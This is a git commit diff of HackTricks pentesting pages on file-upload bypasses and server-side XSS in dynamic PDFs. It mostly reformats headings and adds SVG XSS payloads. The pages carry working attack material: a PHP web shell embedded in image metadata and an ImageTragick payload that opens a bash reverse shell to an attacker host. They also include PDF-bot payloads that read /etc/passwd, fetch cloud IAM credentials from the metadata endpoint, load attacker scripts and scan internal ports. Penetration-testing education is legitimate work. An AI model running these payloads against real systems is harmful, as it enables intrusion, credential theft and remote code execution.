GitBook: [#3154] No subject
This commit is contained in:
parent
5a4f9d6a67
commit
d95209236f
|
@ -1,4 +1,4 @@
|
|||
|
||||
# File Upload
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,25 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## File Upload
|
||||
|
||||
# File Upload
|
||||
|
||||
{% hint style="warning" %}
|
||||
**Support HackTricks and get benefits!**
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
|
||||
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
{% endhint %}
|
||||
|
||||
## File Upload General Methodology
|
||||
### File Upload General Methodology
|
||||
|
||||
Other useful extensions:
|
||||
|
||||
|
@ -46,7 +30,7 @@ Other useful extensions:
|
|||
* **Perl**: _.pl, .cgi_
|
||||
* **Erlang Yaws Web Server**: _.yaws_
|
||||
|
||||
### Bypass file extensions checks
|
||||
#### Bypass file extensions checks
|
||||
|
||||
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
|
||||
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
|
||||
|
@ -73,7 +57,7 @@ Other useful extensions:
|
|||
5. Add **another layer of extensions** to the previous check:
|
||||
* _file.png.jpg.php_
|
||||
* _file.php%00.png%00.jpg_
|
||||
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
|
||||
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code):
|
||||
* _ex: file.php.png_
|
||||
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
|
||||
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
|
||||
|
@ -89,14 +73,14 @@ Other useful extensions:
|
|||
AAA<--SNIP 232 A-->AAA.php.png
|
||||
```
|
||||
|
||||
### Bypass Content-Type & magic number
|
||||
#### Bypass Content-Type & magic number
|
||||
|
||||
1. Bypass Content-Type checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
|
||||
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
|
||||
2. Bypass magic number check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**: `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`
|
||||
1. It is also possible that the **magic bytes** are just being **checked** in the file and you could set them **anywhere in the file**.
|
||||
|
||||
### Other Tricks to check
|
||||
#### Other Tricks to check
|
||||
|
||||
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
||||
* Find a **Local File Inclusion** vulnerability to execute the backdoor.
|
||||
|
@ -109,7 +93,7 @@ Other useful extensions:
|
|||
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
|
||||
* Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
|
||||
|
||||
### Special extension tricks
|
||||
#### Special extension tricks
|
||||
|
||||
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
|
||||
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
|
||||
|
@ -118,7 +102,7 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
|
|||
|
||||
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
|
||||
|
||||
### **wget File Upload/SSRF Trick**
|
||||
#### **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
|
||||
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
|
||||
|
@ -148,13 +132,13 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
|
|||
|
||||
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
|
||||
|
||||
### Other resources
|
||||
#### Other resources
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
|
||||
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
||||
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
||||
|
||||
## From File upload to other vulnerabilities
|
||||
### From File upload to other vulnerabilities
|
||||
|
||||
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
||||
* Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
|
||||
|
@ -164,11 +148,12 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
|||
* **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
|
||||
* [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
|
||||
* [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
|
||||
* Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
|
||||
* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
|
||||
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
|
||||
* Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
|
||||
* Upload the \[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus**
|
||||
* Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
|
||||
* Check if there is any **size limit** uploading files
|
||||
|
||||
Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
|
||||
|
@ -184,22 +169,22 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
|
|||
9. **ZIP**: RCE via LFI / DoS
|
||||
10. **PDF / PPTX**: SSRF / BLIND XXE
|
||||
|
||||
### Burp Extension
|
||||
#### Burp Extension
|
||||
|
||||
{% embed url="https://github.com/portswigger/upload-scanner" %}
|
||||
|
||||
## Magic Header Bytes
|
||||
### Magic Header Bytes
|
||||
|
||||
* **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
|
||||
* **JPG**: `"\xff\xd8\xff"`
|
||||
|
||||
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
||||
|
||||
## Zip/Tar File Automatically decompressed Upload
|
||||
### Zip/Tar File Automatically decompressed Upload
|
||||
|
||||
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
||||
|
||||
### Symlink
|
||||
#### Symlink
|
||||
|
||||
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
|
||||
|
||||
|
@ -209,7 +194,7 @@ zip --symlinks test.zip symindex.txt
|
|||
tar -cvf test.tar symindex.txt
|
||||
```
|
||||
|
||||
### Decompress in different folders
|
||||
#### Decompress in different folders
|
||||
|
||||
The decompressed files will be created in unexpected folders.
|
||||
|
||||
|
@ -292,7 +277,7 @@ Only one step remained: Upload the ZIP file and let the application decompress i
|
|||
|
||||
**Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
|
||||
|
||||
## ImageTragic
|
||||
### ImageTragic
|
||||
|
||||
Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)**
|
||||
|
||||
|
@ -303,13 +288,13 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
|
|||
pop graphic-context
|
||||
```
|
||||
|
||||
## Embedding PHP Shell on PNG
|
||||
### Embedding PHP Shell on PNG
|
||||
|
||||
The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this [imagecopyresized](http://php.net/manual/en/function.imagecopyresized.php) and [imagecopyresampled](http://php.net/manual/en/function.imagecopyresampled.php).
|
||||
|
||||
Read this post: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
||||
|
||||
## Polyglot Files
|
||||
### Polyglot Files
|
||||
|
||||
Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
|
||||
|
||||
|
@ -319,7 +304,6 @@ This helps to upload a file that complins with the format of several different f
|
|||
|
||||
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -335,5 +319,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1070,6 +1070,21 @@ alert("XSS");
|
|||
</svg>
|
||||
```
|
||||
|
||||
```svg
|
||||
<svg width="500" height="500"
|
||||
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<circle cx="50" cy="50" r="45" fill="green"
|
||||
id="foo"/>
|
||||
|
||||
<foreignObject width="500" height="500">
|
||||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width="400" height="250"/>
|
||||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
|
||||
</foreignObject>
|
||||
</svg>ht
|
||||
```
|
||||
|
||||
Find m**ore SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
|
||||
### XSS resources
|
||||
|
||||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Server Side XSS (Dynamic PDF)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,20 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# Server Side XSS (Dynamic PDF)
|
||||
|
||||
## Server Side XSS (Dynamic PDF)
|
||||
|
||||
### Server Side XSS (Dynamic PDF)
|
||||
|
||||
If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
|
||||
So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
|
||||
|
||||
Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
||||
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
||||
|
||||
## Payloads
|
||||
### Payloads
|
||||
|
||||
### Discovery
|
||||
#### Discovery
|
||||
|
||||
```markup
|
||||
<!-- Basic discovery, Write somthing-->
|
||||
|
@ -44,7 +43,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
|||
<link rel=attachment href="http://attacker.com">
|
||||
```
|
||||
|
||||
### SVG
|
||||
#### SVG
|
||||
|
||||
Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
|
||||
|
||||
|
@ -59,9 +58,23 @@ Any of the previous of following payloads may be used inside this SVG payload. O
|
|||
</foreignObject>
|
||||
</g>
|
||||
</svg>
|
||||
|
||||
|
||||
<svg width="100%" height="100%" viewBox="0 0 100 100"
|
||||
xmlns="http://www.w3.org/2000/svg">
|
||||
<circle cx="50" cy="50" r="45" fill="green"
|
||||
id="foo"/>
|
||||
<script type="text/javascript">
|
||||
// <![CDATA[
|
||||
alert(1);
|
||||
// ]]>
|
||||
</script>
|
||||
</svg>
|
||||
```
|
||||
|
||||
### Path disclosure
|
||||
You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
|
||||
|
||||
#### Path disclosure
|
||||
|
||||
```markup
|
||||
<!-- If the bot is accessing a file:// path, you will discover the internal path
|
||||
|
@ -70,7 +83,7 @@ if not, you will at least have wich path the bot is accessing -->
|
|||
<script> document.write(window.location) </script>
|
||||
```
|
||||
|
||||
### Load an external script
|
||||
#### Load an external script
|
||||
|
||||
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
|
||||
|
||||
|
@ -79,7 +92,7 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
|||
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
||||
```
|
||||
|
||||
### Read local file
|
||||
#### Read local file
|
||||
|
||||
```markup
|
||||
<script>
|
||||
|
@ -107,13 +120,13 @@ x.open("GET","file:///etc/passwd");x.send();
|
|||
<portal src="file:///etc/passwd" id=portal>
|
||||
```
|
||||
|
||||
### Get external web page response as attachment (metadata endpoints)
|
||||
#### Get external web page response as attachment (metadata endpoints)
|
||||
|
||||
```markup
|
||||
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
||||
```
|
||||
|
||||
### Bot delay
|
||||
#### Bot delay
|
||||
|
||||
```markup
|
||||
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
|
||||
|
@ -128,7 +141,7 @@ x.open("GET","file:///etc/passwd");x.send();
|
|||
<img src="https://attacker.com/delay">
|
||||
```
|
||||
|
||||
### Port Scan
|
||||
#### Port Scan
|
||||
|
||||
```markup
|
||||
<!--Scan local port and receive a ping indicating which ones are found-->
|
||||
|
@ -147,11 +160,11 @@ for(let i=0; i<1000; i++) {
|
|||
<img src="https://attacker.com/startingScan">
|
||||
```
|
||||
|
||||
### [SSRF](../ssrf-server-side-request-forgery/)
|
||||
#### [SSRF](../ssrf-server-side-request-forgery/)
|
||||
|
||||
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
|
||||
|
||||
|
@ -159,8 +172,6 @@ This vulnerability can be transformed very easily in a SSRF (as you can make the
|
|||
|
||||
{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -176,5 +187,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue